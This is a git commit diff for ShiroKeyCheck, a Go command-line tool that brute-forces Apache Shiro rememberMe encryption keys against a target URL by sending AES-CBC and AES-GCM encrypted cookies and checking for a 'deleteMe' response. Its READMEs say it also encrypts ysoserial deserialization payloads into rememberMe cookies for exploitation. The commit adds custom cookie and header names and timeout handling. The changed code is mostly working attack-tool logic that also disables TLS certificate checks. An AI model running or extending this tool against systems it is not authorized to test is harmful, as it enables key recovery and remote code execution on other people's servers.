update

Author: myzxcg

.gitignore

@@ -1 +1,2 @@
 .DS_Store
+.idea/

Function/FindKey.go

@@ -2,6 +2,7 @@ package Function
 
 import (
 	"ShiroKeyCheck/AES_Encrypt"
+	"ShiroKeyCheck/GlobalVar"
 	"encoding/base64"
 	"fmt"
 )
@@ -10,16 +11,16 @@ func FindTheKey(Shirokeys string, Content []byte) bool {
 	key, _ := base64.StdEncoding.DecodeString(Shirokeys)
 	RememberMe1 := AES_Encrypt.AES_CBC_Encrypt(key, Content) //AES CBC加密
 	RememberMe2 := AES_Encrypt.AES_GCM_Encrypt(key, Content) //AES GCM加密
-	if HttpRequset(RememberMe1) {
+	if HttpRequset2(RememberMe1, Shirokeys, "CBC") {
 		fmt.Println("Find the Key!")
 		fmt.Println("[+] CBC-KEY:", Shirokeys)
-		fmt.Println("[+] rememberMe=", RememberMe1)
+		fmt.Printf("[+] %s=%s\n", GlobalVar.ReqHeader, RememberMe1)
 		return true
 	}
-	if HttpRequset(RememberMe2) {
+	if HttpRequset2(RememberMe2, Shirokeys, "GCM") {
 		fmt.Println("Find the Key!")
 		fmt.Println("[+] GCM-KEY:", Shirokeys)
-		fmt.Println("[+] rememberMe=", RememberMe2)
+		fmt.Printf("[+] %s=%s\n", GlobalVar.ReqHeader, RememberMe2)
 		return true
 	}
 	return false

Function/HttpRequset.go

@@ -1,15 +1,15 @@
 package Function
 
 import (
+	"ShiroKeyCheck/GlobalVar"
 	"crypto/tls"
+	"errors"
 	"fmt"
 	"net/http"
 	"net/url"
 	"os"
 	"strings"
 	"time"
-
-	"ShiroKeyCheck/GlobalVar"
 )
 
 func HttpRequset(RememberMe string) bool {
@@ -42,19 +42,88 @@ func HttpRequset(RememberMe string) bool {
 		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
 	}
 	req.Header.Set("User-Agent", GlobalVar.UserAgent)
-	req.Header.Set("Cookie", "rememberMe="+RememberMe)
+	req.Header.Set("Cookie", GlobalVar.ReqHeader+"="+RememberMe)
 	resp, err := client.Do(req)
+	if err != nil {
+		var e *url.Error
+		errors.As(err, &e)
+		if e.Timeout() {
+			fmt.Println("[Error] The request timed out, please check the network! ")
+			os.Exit(1)
+		} else {
+			fmt.Println(err)
+			os.Exit(1)
+		}
+	}
+	defer resp.Body.Close()
+	//判断rememberMe=deleteMe;是否在响应头中
+	var SetCookieAll string
+	for i := range resp.Header["Set-Cookie"] {
+		SetCookieAll += resp.Header["Set-Cookie"][i]
+	}
+	if !strings.Contains(SetCookieAll, GlobalVar.RespHeader+"=deleteMe;") {
+		return true //内容中不包含rememberMe
+	} else {
+		return false
+	}
+}
+func HttpRequset2(RememberMe string, Shirokeys string, Mode string) bool {
+	//设置跳过https证书验证，超时和代理
+	var tr *http.Transport
+	if GlobalVar.HttpProxy != "" {
+		uri, _ := url.Parse(GlobalVar.HttpProxy)
+		tr = &http.Transport{
+			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
+			Proxy:           http.ProxyURL(uri),
+		}
+	} else {
+		tr = &http.Transport{
+			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
+		}
+	}
+	client := &http.Client{
+		Timeout:   time.Duration(GlobalVar.Timeout) * time.Second,
+		Transport: tr,
+		CheckRedirect: func(req *http.Request, via []*http.Request) error {
+			return http.ErrUseLastResponse //不允许跳转
+		}}
+	req, err := http.NewRequest(strings.ToUpper(GlobalVar.Method), GlobalVar.Url, strings.NewReader(GlobalVar.PostContent))
 	if err != nil {
 		fmt.Println(err)
 		os.Exit(1)
 	}
+	//设置请求头
+	if strings.ToUpper(GlobalVar.Method) == "POST" {
+		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
+	}
+	req.Header.Set("User-Agent", GlobalVar.UserAgent)
+	req.Header.Set("Cookie", GlobalVar.ReqHeader+"="+RememberMe)
+	resp, err := client.Do(req)
+	if err != nil {
+		var e *url.Error
+		errors.As(err, &e)
+		if e.Timeout() {
+			fmt.Printf("[Error] Request TimeOut! Key is %s ,Mode: %s ,Please test manually: \nrememberMe= %s\n", Shirokeys, Mode, RememberMe)
+			GlobalVar.Timeoutcount++
+			if GlobalVar.Timeoutcount >= 3 {
+				fmt.Println("\n[Error] Request Timeout 3 times in a row, please check the network and try again! \n")
+				os.Exit(1)
+			}
+			return false
+		} else {
+			fmt.Println(err)
+			os.Exit(1)
+		}
+	} else {
+		GlobalVar.Timeoutcount = 0
+	}
 	defer resp.Body.Close()
 	//判断rememberMe=deleteMe;是否在响应头中
 	var SetCookieAll string
 	for i := range resp.Header["Set-Cookie"] {
 		SetCookieAll += resp.Header["Set-Cookie"][i]
 	}
-	if !strings.Contains(SetCookieAll, "rememberMe=deleteMe;") {
+	if !strings.Contains(SetCookieAll, GlobalVar.RespHeader+"=deleteMe;") {
 		return true //内容中不包含rememberMe
 	} else {
 		return false

GlobalVar/Variable.go

@@ -12,6 +12,9 @@ var (
 	PostContent  string
 	SerFile      string
 	Aes_mode     string
+	RespHeader   string
+	ReqHeader    string
 	Timeout      int
 	Interval     int
+	Timeoutcount int = 0
 )

README.md

@@ -2,6 +2,11 @@
 
 [中文介绍](README.zh_CN.md)
 
+2022.8.28 Update content:
+1. You can now use the "-reqcookie" parameter to customize the "rememberMe" value sent by default in the cookie field of the request header.
+2. You can also use the "-respheader" parameter to customize the "rememberMe" value detected by default in the response header
+3. Optimize the detection process
+
 Golang development, multi-platform support.
 
 In order to adapt to different targets and different network conditions, a variety of http request parameters have been added, such as: specified request timeout, each request interval, http proxy.
@@ -34,6 +39,10 @@ Usage of ./ShiroKeyCheck:
     	Target url（Needed）
   -ua string
     	User-Agent (default "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36")
+  -reqcookie string
+    	Customize the cookie name in the request packet to be detected (Default detection "rememberMe" string) (default "rememberMe")
+  -respheader string
+    	Customize the header name in the response packet to be detected (Default detection "rememberMe" string) (default "rememberMe")
 ```
 
 ## keyCheck

README.zh_CN.md

@@ -1,4 +1,10 @@
 # Shiro key检测
+
+2022.8.28 更新内容：
+1. 现在可使用"-reqcookie" 参数自定义请求头的cookie字段默认发送的"rememberMe" 值。
+2. 也可使用"-respheader" 参数自定义响应头中默认检测的"rememberMe" 值
+3. 对检测过程进行优化
+
 golang 开发，多平台支持。
 
 为了适应不同目标不同网络情况，增加了多种http请求参数，如：指定请求超时时间、每次请求间隔时间、http代理。
@@ -7,6 +13,7 @@ golang 开发，多平台支持。
 
 支持对ysoserial 生成的payload进行加密，生成rememberMe字段，进行利用。
 
+
 ## 用法
 
 ```
@@ -31,6 +38,10 @@ Usage of ./ShiroKeyCheck:
     	目标url（必须）
   -ua string
     	User-Agent (default "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36")
+  -reqcookie string
+    	自定义检测请求包中的cookie名称（默认值为“rememberMe”）
+  -respheader string
+    	自定义检测响应包中的header名称（默认值为“rememberMe”）
 ```
 ### key检测
 

main.go

@@ -1,8 +1,8 @@
 package main
 
-//CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o ShiroKeyCheckLinux main.go
-//CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -o ShiroKeyCheck.exe main.go
-//go build -ldflags="-s -w" -o ShiroKeyCheck main.go && upx -9 server
+//CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o ShiroKeyCheck_linux-arm64 main.go
+//CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -o ShiroKeyCheck_windows-amd64.exe main.go
+//go build -ldflags="-s -w" -o ShiroKeyCheck_darwin-arm64 main.go && upx -9 server
 import (
 	"ShiroKeyCheck/AES_Encrypt"
 	"ShiroKeyCheck/Function"
@@ -29,6 +29,8 @@ func GetCommandArgs() {
 	flag.StringVar(&GlobalVar.Pointkey, "key", "", "Specify the key and use CBC and GCM modes for detection")
 	flag.StringVar(&GlobalVar.Aes_mode, "mode", "", "Specify CBC or GCM encryption mode (only valid for -ser parameter)")
 	flag.StringVar(&GlobalVar.SerFile, "ser", "", "Encrypt the bytecode file to generate the RememberMe field")
+	flag.StringVar(&GlobalVar.RespHeader, "respheader", "rememberMe", "Customize the header name in the response packet to be detected")
+	flag.StringVar(&GlobalVar.ReqHeader, "reqcookie", "rememberMe", "Customize the cookie name in the request packet to be detected")
 
 	flag.Parse()
 }